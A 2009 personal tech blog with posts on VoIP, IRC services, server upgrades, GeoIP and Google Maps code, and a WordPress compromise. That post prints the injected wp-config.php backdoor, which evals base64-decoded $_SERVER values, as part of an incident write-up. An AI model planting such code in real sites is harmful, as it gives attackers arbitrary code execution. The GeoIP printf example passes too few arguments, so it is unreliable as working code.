New-fangled Phone-things

September 18th, 2009

I’ve been failed pretty badly by my rather new-age phone setup over the last few days. I’ve missed important calls by an abject failure of my carriers to deliver them to my handsets.

For instance, early this week, Google Voice (or QuantumVoice, my VoIP provider) were failing to deliver calls to my ATA. Calls to my “home” number went to voicemail; which is a message that says “call my Google Voice number.”

And tonight, I discovered that my iPhone has been reporting solid 3G for 2 days straight but has been lying to me. I rebooted it this evening at a restaurant to discover I had 3 voicemails and 1 text message from YESTERDAY.

Some days, I long for old world landlines. I might just get one; Qwest is building out an ADSL2 cabinet outside my subdivision and have told me it should be online by October 7th. It might be time to migrate from cable to ADSL and pick up a landline in the process. At least then I’ll have faith that my incoming calls will complete.

Cranky grumbling complete.

I suck at remembering at what I fixed, so I rely on svn

September 13th, 2009

A user came into #help on EsperNet today and asked about an issue with ChanServ’s KEEPTOPIC feature.

I remembered this being a bug; but I totally forgot that I fixed it.

So, I asked Subversion:

------------------------------------------------------------------------
r196 | srees | 2009-04-25 11:16:22 -0600 (Sat, 25 Apr 2009) | 2 lines

* "Fix" TBURST to send 0 as the channel TS to force esphyb servers to accept the topic
 bursts at any time (not just at channel creation)

Now, the only problem is that I wasn’t sure whether or not I deployed this fix. Oh well, one problem at a time.

I love commit logs.

Well, an update worth its salt

September 2nd, 2009

(turns out I have something technical to blog about, after all.)

Well, I haven’t played with WordPress for a while and it turns out I was a few point-releases back. But, I digress.

When I was writing the last post, I noticed that there was some funny syntax at the end of the Permalink. Actually, it said something like base64_encode and $_SERVER["HTTP_EXECCODE"]. For some reason, I saw these and ignored them (in fact, I mentally chalked them up to a weirdness in Safari on Snow Leopard).

I had a bit of dinner, then my brain turned on. I was looking at PHP that got included inline into markup; this was not a browser bug.

After some investigation, I found a spurious new function added to my wp-config.php (below). This, combined with the update to my Permalink format, suggested server (or application) compromise. The offending code (pretty-printed for readability):

function gpc_4663($l4665) {
  if (is_array($l4665)) {
    foreach($l4665 as $l4663 => $l4664)
      $l4665[$l4663] = gpc_4663($l4664);
   } else if (is_string($l4665) && substr($l4665,0,4)=="____") {
     eval(base64_decode(substr($l4665,4)));
     $l4665=null;
   }

   return $l4665;
}

if(empty($_SERVER))
  $_SERVER = $HTTP_SERVER_VARS;

array_map("gpc_4663",$_SERVER);

Arbitrary code injection — through query parameter, no less. Someone could simply go to any page including this file (which is any database-accessing page) and add a Base64-encoded string with code for the PHP interpreter to execute. Great.

I think the worst thing about this compromise is that I have no idea how the attacker did it.

As I said before, I was a few point releases behind on my WordPress installation. Unfortunately, if this was a known attack, I have no way of knowing it. The folks over at WordPress are seemingly tight-lipped as to the nature of their security updates, so if you’ve been compromised along a vector they’ve since fixed, you’re in the dark. Now I’m just wondering if I still have a big open hole in my WordPress installation.

As for the loss of data, my post-incident analysis reveals that the compromiser got nothing. Whew.

Oh well. If you run WordPress, check your installs.

Monthly Post

September 2nd, 2009

Point Reyes National Seashore

I promised myself I would blog more often and on technical subjects. Lately, I’ve been hacking on some cool networking stuff at work and hacking on my house in my spare time (finally finalizing my basement!) and traveling. So, I haven’t done anything super-exciting tech-wise that I feel comfortable blogging about, so I’ll post with a lovely picture of my trip to California.

This is a photo from a hike my brother and I did out at Point Reyes National Seashore last month. Great fun, but I think I wore out my feet on that hike.

That’s it for now. Hopefully something more substantial in the near future.

Socializing Medicine by Taxing the Rich

August 1st, 2009

So, I had this thought just a minute ago (literally as I was closing my eyes to go to sleep). This thought is half-baked at best. (disclaimer over)

For some reason, I remembered that during President George W Bush’s administration, one of his economic principles was the “trickle-down” methodology. To me, this meant as approximately this:

  1. Lower taxes on higher income brackets.
  2. The high-earners now have more money to spend.
  3. The high-earners spend money and that stimulates the economy.

So, by using that logic, it seems that if we were to socialize medicine (disclaimer #2: I have no particular feelings on healthcare reform other than I think something should be done and that I’m not smart enough nor informed enough to know precisely what we should do) by taxing the rich, we would in essence be re-capturing a pre-existing expense (that is: health insurance for employees) as a “tax.” I think it might even be net-zero.

Let’s see:

  1. We “socialize” medicine by taking the cost of health insurance out of the regular economy and assigning it to the government; this removes a huge cost burden on American companies (may help them stay competitive with international firms, too)
  2. Big-time investors in these companies realize higher dividends due to higher profits driven by lowered costs.
  3. Raise taxes on the very wealthy to pay for this healthcare, some (most?) of whom may be the very same big-time investors (in the aggregate of their investments).

In essence, because the government (“the people”) assumed the cost of healthcare in this scenario (which some have called a “crushing cost”), private investors would see higher dividends on their investments. We would then (indirectly) tax those gains away to pay for it. It’s possible the effect would be net-zero (or even net-positive if costs are actually lowered) in the long term. So, in the end, we improved the efficiency of the private sector and converted pre-existing costs into approximately equivalent (maybe even lower) taxes.

(Note #1: This idea conveniently ignores tax-sheltered investments and small-time investors; it also presumes that lower costs will not translate to lower consumer pricing. Also, this idea is lacking in specific numbers; this is further evidence of my overall lack of economic sophistication.)

(Note #2: The thought that “socializing” medicine may lower costs is on the basis that Medicare has very low overhead (I’ve heard 2-5%) versus private insurers (I’ve heard 25-35%). Also, I imagine if there was a single-payer, that the medical billing costs in doctors offices would lessen.)

(Note #3: This also assumes the size of the problem stays the same. This is probably not true as the goal of healthcare reform is to cover more people/everyone. See note #2 though.)

See what I mean about half-baked? Now time for bed.

episkey Upgrade

July 26th, 2009

So, it’s been over a year since I racked my server (episkey) at its data center. I done such an enormously successful job of remote management that I haven’t had a need to make a visit until today.

So, with Myles help, we headed out to the data center out in the middle-of-nowhere (really, it’s pretty out there) with a new (bigger! better!) hard drive in tow and a software upgrade staged.

My overwhelming skills at FreeBSD management paid off once again. I had the upgrade in its final state (“install and reboot!”) and the data backed up. In the end, episkey ended up running FreeBSD 7.2-STABLE (from 7.0-STABLE) and a 1TB drive for user data (up from 80GB). The whole process took about 45 minutes and included unracking and reracking the box for the disk install. This was the very definition of smooth.

The sad statistic: 45 minutes of actual work and 3 hours of driving. Like I said, the data center is pretty far out of the way. It even has a cattle gate.

Really.

In other news, I’ve been working with Rory on a web front-end to ircservices. My part has been to refactor the ircservices httpd module to export XML (parseable) as opposed to hackneyed HTML. Rory’s been working on a PHP front-end. So far so good; I hope we can prove out some useful functionality for our users.

Showing Off my Rack

July 18th, 2009
The home network rack in the basement.

The rack in the basement.

I’ve always wanted to have a rack of equipment in my house. I don’t know why, but I’ve always had a fairly strong IT-oriented bent to my geekery (networks, servers, and things) and having my own rack just seemed like a natural thing.

So, when I finished my basement, I made a special point to finally achieve my rackish goal.

And here it is!

I have 15 ports of Cat5e running through to the various rooms in my town house all terminated into a patch panel and then into the ProCurve 1800 at the top. I also broke out and terminated my phone lines onto that patch panel; so now I have 4 and 4 (incoming lines from Qwest, outgoing lines to my wall jacks) that can be patched together however I want. I did the same thing to the 12 runs of coax I had; they all terminate into a coax patch panel (inputs from Comcast, Dish Network, and DTV Antenna — outputs to all the jacks around the house).

All the media center equipment and servers are also in this room (out of picture, except avifors – the Dell at the bottom right).

All in all, I’m pretty happy with this setup and pretty eager to show it off. So, here it is :)

(also in picture: Cisco 2950 and 2600 for testing/learning purposes, APC by Schneider Electric1 UPS, and shelf with the cable modem, VoIP adapter, and WAP).

1 – I just couldn’t help myself.

Geeking with GeoIP

July 11th, 2009

In the continuing theme of geography; I started playing around with MaxMind’s libGeoIP C API for integration into the Blitzed Open-Proxy Monitor (BOPM) for EsperNet (for more information on this, contact me directly).

This, like the Google Maps API, is a remarkably easy API to use. For EsperNet’s purposes, we only want to discover the country code of each user connecting to the network. It’s pretty much as simple as saying “Hey libGeoIP, what country is 1.2.3.4 from?”

#include <stdio.h>
#include <GeoIP.h> 

int main(int argc, char *argv[]) {
    char *addr = argv[1];

    // get geoip.dat from http://www.maxmind.com/app/geolitecountry
    GeoIP *gi = GeoIP_open("geoip.dat", GEOIP_MEMORY_CACHE | GEOIP_CHECK_CACHE);

    printf("%s is from %s (%s)\n",
        GeoIP_country_name_by_addr(gi, addr),
        GeoIP_country_code_by_addr(gi, addr));

    GeoIP_close(gi);
}

I’m wondering what else I can integrate this into… maybe ircservices for statistics purposes.

A trace from the past

July 4th, 2009

I found this little gem in my old bucket.

The two-end points are in Colorado (from my house to the server you’re reading this on). Usually the routing is a little more… direct:

traceroute to episkey.dreamfire.net (208.72.157.61), 64 hops max, 40 byte packets
1  * * *
2  ge-3-1-ur01.fortcollins.co.denver.comcast.net (68.85.220.105)  8.680 ms  11.842 ms  8.921 ms
3  te-9-3-ur02.longmont.co.denver.comcast.net (68.86.103.157)  10.205 ms  11.055 ms  8.932 ms
4  te-9-1-ur01.longmont.co.denver.comcast.net (68.86.103.161)  10.228 ms  9.643 ms  9.276 ms
5  te-3-1-ar01.denver.co.denver.comcast.net (68.86.103.154)  11.923 ms  9.321 ms  13.237 ms
6  68.86.128.249 (68.86.128.249)  11.055 ms  10.652 ms  11.312 ms
7  68.86.91.17 (68.86.91.17)  19.896 ms  11.706 ms  9.283 ms
8  pos-0-10-0-0-cr01.denver.co.ibone.comcast.net (68.86.86.22)  14.862 ms  11.630 ms  14.365 ms
9  pos-0-8-0-0-cr01.chicago.il.ibone.comcast.net (68.86.85.113)  37.695 ms  37.270 ms  37.667 ms
10  po-0-1-0-0-pe01.350ecermak.il.ibone.comcast.net (68.86.86.38)  36.850 ms  38.605 ms  36.660 ms
11  208.173.180.41 (208.173.180.41)  36.016 ms  36.893 ms  36.004 ms
12  bpr1-ge-7-0-0.chicagoequinix.savvis.net (204.70.194.249)  35.500 ms  36.743 ms  35.415 ms
13  208.174.226.26 (208.174.226.26)  37.763 ms  38.972 ms
    0.so-0-0-2.BR6.CHI2.ALTER.NET (208.174.226.2)  37.689 ms
14  po4-0.core01.ord03.atlas.cogentco.com (154.54.13.109)  36.536 ms  37.211 ms  49.305 ms
15  te3-1.mpd01.ord03.atlas.cogentco.com (154.54.3.234)  37.265 ms  36.783 ms  38.449 ms
16  xo.ord03.atlas.cogentco.com (154.54.12.230)  38.080 ms  39.006 ms  40.243 ms
17  te-3-2-0.rar3.chicago-il.us.xo.net (207.88.12.13)  36.732 ms  44.135 ms  38.561 ms
18  207.88.12.149.ptr.us.xo.net (207.88.12.149)  78.573 ms  70.847 ms
    bpr1-ge-7-0-0.chicagoequinix.savvis.net (204.70.194.249)  38.535 ms
19  204.70.1.6 (204.70.1.6)  74.638 ms  108.290 ms  65.531 ms
20  cr1-pos-0-8-2-3.NewYork.savvis.net (204.70.1.5)  68.222 ms  74.689 ms  64.239 ms
21  204.70.1.6 (204.70.1.6)  86.968 ms  82.962 ms  86.217 ms
22  cr1-pos-0-8-2-3.NewYork.savvis.net (204.70.1.5)  66.318 ms
    208.175.175.89 (208.175.175.89)  89.899 ms  89.622 ms
23  dpr1-ge-2-0-0.dallasequinix.savvis.net (204.70.204.146)  89.152 ms  84.768 ms  87.890 ms
24  0.so-0-2-0.BR1.DFW9.ALTER.NET (204.255.169.101)  66.370 ms
    208.173.178.170 (208.173.178.170)  67.619 ms
    0.so-0-2-0.BR1.DFW9.ALTER.NET (204.255.169.101)  63.557 ms
25  0.so-5-0-0.XT4.DFW9.ALTER.NET (152.63.96.78)  64.431 ms  71.442 ms  62.534 ms
26  0.so-7-1-1.XL4.DFW7.ALTER.NET (152.63.103.41)  63.858 ms  67.172 ms  64.701 ms
27  * * *
28  episkey (208.72.157.61)  46.105 ms  44.135 ms  43.661 ms

This trace came around when my data center was switching to and from its primary links (Internap and Cogent); this trace comes amid route convergence along the rest of the internet. Fun, anyway, though :)

Playing with Google Maps API

July 2nd, 2009

Google-enabled Esper Servers Page

I had the chance a few days ago to play with the Google Maps API to rework EsperNet’s Servers Page. It turns out that very much like Google’s applications, it’s APIs are also ludicrously easy to use.

I only spent a few hours putting together a real server map (as opposed to a static table of names, locations, etc) that actually looks nice!

To be honest, I spent most of the time putting together the little fly out window. It required new CSS classes and a lot of construction and insertion of elements into the DOM. Getting it looking just right (doesn’t quite look right in IE 7 — the staff table doesn’t show up) was by far the most time consuming activity.

To get started with something like this, get yourself a Google Map API key and code up a little something like this:

<!-- style for height and width -->
<div id="map"></div>
<script type="text/javascript">
  // initialize the map
  function initialize_map() {
    if (GBrowserIsCompatible()) {
      var map = new GMap2(document.getElementById("map"));

      map.setCenter(new GLatLng(50,-50), 2);

      map.setUIToDefault();
    }
  }

  // add events to run on load for IE (top block) and everything else (bottom)
  if (window.attachEvent) {
    window.attachEvent("onload", initialize_map);
    window.attachEvent("onunload", GUnload);
  } else {
    window.addEventListener("load", initialize_map, false);
    window.addEventListener("unload", GUnload, false);
  }
</script>

You can then add new points very easily:

var point = new GLatLng("50", "50"); // lat, longitude
var marker = new GMarker(point, { title:"Cool Title" });

GEvent.addListener(marker, "click", function() {
  marker.openInfoWindow(document.createTextNode("info"));
});

map.addOverlay(marker);

You can call openInfoWindow with any DOM element. For the servers page, I built up a DIV filled with some text and a table. Or you can just add text.

For latitude and longitude, I used Google Maps and put in a city name (e.g; Morrison, CO). I’m not sure if there’s an easy way to do this through the API. It would make life simpler!